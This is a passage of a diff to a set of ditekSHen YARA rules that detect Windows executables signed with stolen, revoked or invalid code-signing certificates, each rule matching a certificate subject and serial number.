-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ANJELA KEY LIMITED" and pe.signatures [ i ] . serial == "4c:45:0e:cc:d6:1d:33:4e:0a:fb:2b:2d:9b:b1:d8:12" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Affairs-case s.r.o." and pe.signatures [ i ] . serial == "29:2e:b1:13:35:07:f4:2e:6f:36:c5:54:9c:18:9d:5e" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0E1Bacb85E77D355Ea69Ba0B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_2Aaa455A172F7E3A2Dffb5C6B14F9C16 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "18e2dce1-c6aa-55d8-907a-75097feb7acf"
+		id = "81c115a7-7ddf-58ba-b56e-a92652c7f217"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L863-L874"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7487-L7499"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f0753c83001e2b9d235afe51ce5d245e085551584ee052a35aaadd95c6c5eeb7"
+		logic_hash = "dd10d388e9122585c8e5b2073725f50edbc85d0ca1e94a4b034e500e0e89b608"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "6750c9224540d7606d3c82c7641f49147c1b3fd0"
+		thumbprint = "23c91b66bd07e56e60724b0064d4fedbdb1c8913"
+		hash1 = "7852cf2dfe60b60194dae9b037298ed0a9c84fa1d850f3898751575f4377215f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BULDOK LIMITED" and pe.signatures [ i ] . serial == "0e:1b:ac:b8:5e:77:d3:55:ea:69:ba:0b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DREAM VILLAGE s.r.o." and pe.signatures [ i ] . serial == "2a:aa:45:5a:17:2f:7e:3a:2d:ff:b5:c6:b1:4f:9c:16" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5998B4Affe2Adf592E6528Ff800E567C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_1Ef6392B2993A6F67578299659467Ea8 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b81787fd-a8f1-5640-bf8a-8129f708a337"
+		id = "f5539ca9-d5cc-538e-8e53-3274791bfa2b"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L876-L887"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7501-L7513"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "d9f589ce6367517f3c93b7b0675b19249108849e52bd9264e31bf8109e5a121f"
+		logic_hash = "eabfeb7abc968188276ba76cd94bd80aba340f5f920881fe13c0f7b093d65a55"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "d990d584c856bd28eab641c3c3a0f80c0b71c4d7"
+		thumbprint = "e87d3e289ccb9f8f9caa53f2aefba102fbf4b231"
+		hash1 = "8282e30e3013280878598418b2b274cadc5e00febaa2b93cf25bb438ee6eb032"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "BEAT GOES ON LIMITED" and pe.signatures [ i ] . serial == "59:98:b4:af:fe:2a:df:59:2e:65:28:ff:80:0e:56:7c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ALUSEN d. o. o." and pe.signatures [ i ] . serial == "1e:f6:39:2b:29:93:a6:f6:75:78:29:96:59:46:7e:a8" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_00B7E0Cf12E4Ae50Dd643A24285485602F : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0F007898Afcba5F8Af8Ae65D01803617 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "d314925c-c6b2-5a7f-ba73-038ea4759149"
+		id = "1c3fddc2-3348-5f94-bf3e-5ce95b6ef009"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L889-L900"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7515-L7527"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "7aefb436b7e3865b1abb6bbc3e0027a628f39e25cb4b28f35f070e000c19c1c7"
+		logic_hash = "260dbdd3d295ace9c478cc27061065803c159957a1eb2f7965ee2b358f02a73c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "744160f36ba9b0b9277c6a71bf383f1898fd6d89"
+		thumbprint = "5687481a453414e63e76e1135ed53f4bd0410b05"
+		hash1 = "815f1f87e2df79e3078c63b3cb1ffb7d17fd24f6c7092b8bbe1f5f8ceda5df22"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "GESO LTD" and pe.signatures [ i ] . serial == "00:b7:e0:cf:12:e4:ae:50:dd:64:3a:24:28:54:85:60:2f" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "TechnoElek s.r.o." and pe.signatures [ i ] . serial == "0f:00:78:98:af:cb:a5:f8:af:8a:e6:5d:01:80:36:17" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_767436921B2698Bd18400A24B01341B6 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00Aa1D84779792B57F91Fe7A4Bde041942 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "ffd19457-1a5d-5782-89e2-3dd4090f124f"
+		id = "57b4741a-a23d-51aa-ad83-3a7d80368290"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L902-L913"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7529-L7543"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "b09ec625a06dcf90df52c56b78889f24d55dbd8cbd7d82a07bdbc842318ff19a"
+		logic_hash = "2e57d646910c570f421939fd0d47ddee60bc38bb2ca2ba1991bf334cf8d5574b"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "871899843b5fd100466e351ca773dac44e936939"
+		thumbprint = "6c15651791ea8d91909a557eadabe3581b4d1be9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "REBROSE LEISURE LIMITED" and pe.signatures [ i ] . serial == "76:74:36:92:1b:26:98:bd:18:40:0a:24:b0:13:41:b6" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "AXIUM NORTHWESTERN HYDRO INC." and ( pe.signatures [ i ] . serial == "aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" or pe.signatures [ i ] . serial == "00:aa:1d:84:77:97:92:b5:7f:91:fe:7a:4b:de:04:19:42" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_26B125E669E77A5E58Db378E9816Fbc3 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0690Ee21E99B1Cb3B599Bba7B9262Cdc : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "18985965-9e26-526c-9354-20667d472615"
+		id = "0fa2103e-c04e-5380-b4e3-6ac35f0b71d8"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L915-L926"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7545-L7556"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "859793bfeba55c9912a1e18db86cd391d4c4981f4be11f3a53d887d429882671"
+		logic_hash = "bc2aac1bd21f80d4233af37028820a36ebd56bceed9b1318e99e75b28b9408e3"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "900aa9e6ff07c6528ecd71400e6404682e812017"
+		thumbprint = "ff9a35ef5865024e49096672ab941b5c120657b9"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLOWER DELI LTD" and pe.signatures [ i ] . serial == "26:b1:25:e6:69:e7:7a:5e:58:db:37:8e:98:16:fb:c3" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Xiamen Tongbu Networks Ltd." and pe.signatures [ i ] . serial == "06:90:ee:21:e9:9b:1c:b3:b5:99:bb:a7:b9:26:2c:dc" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_29A248A77D5D4066Fe5Da75F32102Bb5 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_425Dc3E0Ca8Bcdce19D00D87E3F0Ba28 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "b71f4ee4-55d1-51c7-8fc3-1c6fcaa64a86"
+		id = "41423db4-c475-558b-9a27-2b0ea59102ad"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L928-L939"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7558-L7569"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "063a8b361e9fc91619912109427f6a0cbc7755e85dae820ea0f16709ac580ed1"
+		logic_hash = "0fc85d3d01b37ff7870cade6f8e0e756593ff0b5c9eea3b687ff52985caa20dd"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "1078c0ab5766a48b0d4e04e57f3ab65b68dd797f"
+		thumbprint = "c58bc4370fa01d9a7772fa8c0e7c4c6c99b90561"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SUN & STARZ LIMITED" and pe.signatures [ i ] . serial == "29:a2:48:a7:7d:5d:40:66:fe:5d:a7:5f:32:10:2b:b5" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Protover LLC" and pe.signatures [ i ] . serial == "42:5d:c3:e0:ca:8b:cd:ce:19:d0:0d:87:e3:f0:ba:28" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_3A9Bdec10E00E780316Baaebfe7A772C : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_00881573Fc67Ff7395Dde5Bccfbce5B088 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "0879b4f7-4058-5391-b8bf-90a46ef337f6"
+		id = "10ef1865-9267-5f06-a1d5-9196b00f3dc6"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L941-L952"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7571-L7585"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "f1c0d23c9aa2ff705e3350e15b7ff83fc007ce6aaa57c4ed59201f3022f5d00a"
+		logic_hash = "5b137cccecb16ad116b73fa1f9025f76846b85009fbd4962956499031d6eff35"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "981b95ffcb259862e7461bc58516d7785de91a8a"
+		thumbprint = "31b3a3c173c2a2d1086794bfc8d853e25e62fb46"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "PLAN ALPHA LIMITED" and pe.signatures [ i ] . serial == "3a:9b:de:c1:0e:00:e7:80:31:6b:aa:eb:fe:7a:77:2c" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade in Brasil s.r.o." and ( pe.signatures [ i ] . serial == "88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" or pe.signatures [ i ] . serial == "00:88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" ) )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_73F9819F3A1A49Bac1E220D7F3E0009B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_15C5Af15Afecf1C900Cbab0Ca9165629 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "06f448cf-1f0e-5db5-bdb5-30238c5f7341"
+		id = "795fa78b-0cd4-5eb4-9d37-72b5c38e7466"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L954-L965"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7587-L7599"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9244fae0be6c1addbd0c740d7e153fd4109101184bc61375ddadb6d784769010"
+		logic_hash = "cfc72a85954cb12d89a09b47b5937216a7cfee4a71ac6335a2a94faadea1f68c"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "bb04986cbd65f0994a544f197fbb26abf91228d9"
+		thumbprint = "69735ec138c555d9a0d410c450d8bcc7c222e104"
+		hash1 = "2ae575f006fc418c72a55ec5fdc26bc821aa3929114ee979b7065bf5072c488f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Jean Binquet" and pe.signatures [ i ] . serial == "73:f9:81:9f:3a:1a:49:ba:c1:e2:20:d7:f3:e0:00:9b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Kompaniya Auttek" and pe.signatures [ i ] . serial == "15:c5:af:15:af:ec:f1:c9:00:cb:ab:0c:a9:16:56:29" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0989C97804C93Ec0004E2843 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_12705Fb66Bc22C68372A1C4E5Fa662E2 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "13b2dd06-878e-5539-91d1-eff8607997c3"
+		id = "c9604f76-ad8a-5ac0-ba12-5030b12bedbf"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L967-L978"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7601-L7613"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "65b695eed221db86928ebd32a1f3cb35729754ba41cb2e5b6cf944890d211120"
+		logic_hash = "a212e491ce661dec5512f82eed42b1863afb75ce7fb185c41af178f3852b78c8"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "98549ae51b7208bda60b7309b415d887c385864b"
+		thumbprint = "288959bd1e8dd12f773e9601dc21c57678769909"
+		hash1 = "151b1495d6d1c68e32cdba36d6d3e1d40c8c0d3c12e9e5bd566f1ee742b81b4e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Shanghai Hintsoft Co., Ltd." and pe.signatures [ i ] . serial == "09:89:c9:78:04:c9:3e:c0:00:4e:28:43" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "APRIL BROTHERS LTD" and pe.signatures [ i ] . serial == "12:70:5f:b6:6b:c2:2c:68:37:2a:1c:4e:5f:a6:62:e2" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_6Ba32F984444Ea464Bea41D99A977Ea8 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_205483936F360924E8D2A4Eb6D3A9F31 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6fee5b3f-f72e-531e-b11e-e402207072ff"
+		id = "5cce232b-4dfc-5931-a4ea-2e3df5616026"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L980-L991"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7615-L7627"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "fcabdd038a2594dffddbfff71a7a8a1abae89c637355b3be7e5f26c1eb9e39c7"
+		logic_hash = "09bf63b88eda95aae094cecb868838f08b88a6b4fe2993145e20293034c12863"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "ae9e65e26275d014a4a8398569af5eeddf7a472c"
+		thumbprint = "430dbeff2f6df708b03354d5d07e78400cfed8e9"
+		hash1 = "e58b9bbb7bcdf3e901453b7b9c9e514fed1e53565e3280353dccc77cde26a98e"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "JIN CONSULTANCY LIMITED" and pe.signatures [ i ] . serial == "6b:a3:2f:98:44:44:ea:46:4b:ea:41:d9:9a:97:7e:a8" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SATURN CONSULTANCY LTD" and pe.signatures [ i ] . serial == "20:54:83:93:6f:36:09:24:e8:d2:a4:eb:6d:3a:9f:31" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_4F5A9Bf75Da76B949645475473793A7D : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_06Bcb74291D96096577Bdb1E165Dce85 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "094b56b9-15fc-5366-9023-c706613882c4"
+		id = "e7c24edc-2e59-5ee1-ad2f-d260b4014fdd"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L993-L1004"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7629-L7641"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "8f00efcd62a934fb6ec0205dc1d7bb7f7f3ab168150fee942536ef92f686d21d"
+		logic_hash = "34f533f7c7e12aaac9a1998654fae6ffde366affa90e9cba061b356fa7190e71"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "f7de21bbdf5effb0f6739d505579907e9f812e6f"
+		thumbprint = "d1bde6303266977f7540221543d3f2625da24ac4"
+		hash1 = "074cef597dc028b08dc2fe927ea60f09cfd5e19f928f2e4071860b9a159b365d"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "EXEC CONTROL LIMITED" and pe.signatures [ i ] . serial == "4f:5a:9b:f7:5d:a7:6b:94:96:45:47:54:73:79:3a:7d" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Revo Security SRL" and pe.signatures [ i ] . serial == "06:bc:b7:42:91:d9:60:96:57:7b:db:1e:16:5d:ce:85" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_68B050Aa3D2C16F77E14A16Dc8D1C1Ac : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_0D261C8470Adbb65800Ceaf3Eac70819 : FILE
 {
 	meta:
 		description = "Detects executables signed with stolen, revoked or invalid certificate"
 		author = "ditekSHen"
-		id = "b49d3f1d-34b4-578e-ab36-b0744deef548"
+		id = "0304b3ae-6a3c-5831-a749-76432b3356b4"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1006-L1017"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7643-L7655"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "9de23897fbfe3c4a6d649558d1d71f890117ec80967bc5bd975aa6f33576c702"
+		logic_hash = "e71f5d24500ac202aad5a439aa0d5f1bf7e6259c1d7e11bb40c7b9ae93bd86c0"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "c757e09e7dc5859dbd00b0ccfdd006764c557a3d"
+		thumbprint = "307ef8a02a0fc9032591c624624fa3531c235aa1"
+		hash1 = "050dbd816c222d3c012ba9f2b1308db8e160e7d891f231272f1eacf19d0a0a06"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "SLOW POKE LTD" and pe.signatures [ i ] . serial == "68:b0:50:aa:3d:2c:16:f7:7e:14:a1:6d:c8:d1:c1:ac" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Bandicam Company Corp." and pe.signatures [ i ] . serial == "0d:26:1c:84:70:ad:bb:65:80:0c:ea:f3:ea:c7:08:19" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_0F2B44E398Ba76C5F57779C41548607B : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_40E27B7404Aa9B485F8A2Fc0C8E53Af3 : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "6a962fd8-c2cd-5abd-8f80-95697771037c"
+		id = "1aee45e6-ff0b-56a6-a50e-284bf2122e3b"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1019-L1030"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7657-L7668"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "172622595a3f6a6ab4ac2677c3064fab87b0a872c261031331c99cbd58671da2"
+		logic_hash = "95a0bcf9b52ba8f4b63453abf0ee28027689450557a2408c6b27f8aafcbbe945"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "cef53e9ca954d1383a8ece037925aa4de9268f3f"
+		thumbprint = "ca468ff8403a8416042705e79dbc499a5ea9be85"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "DIGITAL DR" and pe.signatures [ i ] . serial == "0f:2b:44:e3:98:ba:76:c5:f5:77:79:c4:15:48:60:7b" )
+		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Southern Wall Systems, LLC" and pe.signatures [ i ] . serial == "40:e2:7b:74:04:aa:9b:48:5f:8a:2f:c0:c8:e5:3a:f3" )
 }
 
-rule DITEKSHEN_INDICATOR_KB_CERT_5Ad4Ce116B131Daf8D784C6Fab2Ea1F1 : FILE
+rule DITEKSHEN_INDICATOR_KB_CERT_627Dfdf73A1455De5143A270799E6B7B : FILE
 {
 	meta:
-		description = "Detects executables signed with stolen, revoked or invalid certificate"
+		description = "Detects executables signed with stolen, revoked or invalid certificates"
 		author = "ditekSHen"
-		id = "abb6c51b-987a-5a1f-9d31-1422b41a6a6d"
+		id = "7d5f0279-9498-5713-9c02-a025268d108f"
 		date = "2024-10-04"
 		modified = "2024-10-04"
 		reference = "https://github.com/ditekshen/detection"
-		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L1032-L1043"
+		source_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/yara/indicator_knownbad_certs.yar#L7670-L7681"
 		license_url = "https://github.com/ditekshen/detection/blob/e76c93dcdedff04076380ffc60ea54e45b313635/LICENSE.txt"
-		logic_hash = "3221ffd8203cbef8735ed48acd77daae6bee33ade236b1ff2ced81a0f27d4ce5"
+		logic_hash = "833e772e56e87f730ee1acb9d6ed747d239903cfd9470d777efab73c5d656f49"
 		score = 75
 		quality = 75
 		tags = "FILE"
-		thumbprint = "de2dad893fdd49d7c0d498c0260acfb272588a2b"
+		thumbprint = "7b69ff55d3c39bd7d67a10f341c1443425f0c83f"
 		importance = 20
 
 	condition:
-		uint16( 0 ) == 0x5a4d and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "ORDARA LTD" and pe.signatures [ i ] . serial == "5a:d4:ce:11:6b:13:1d:af:8d:78:4c:6f:ab:2e:a1:f1" )
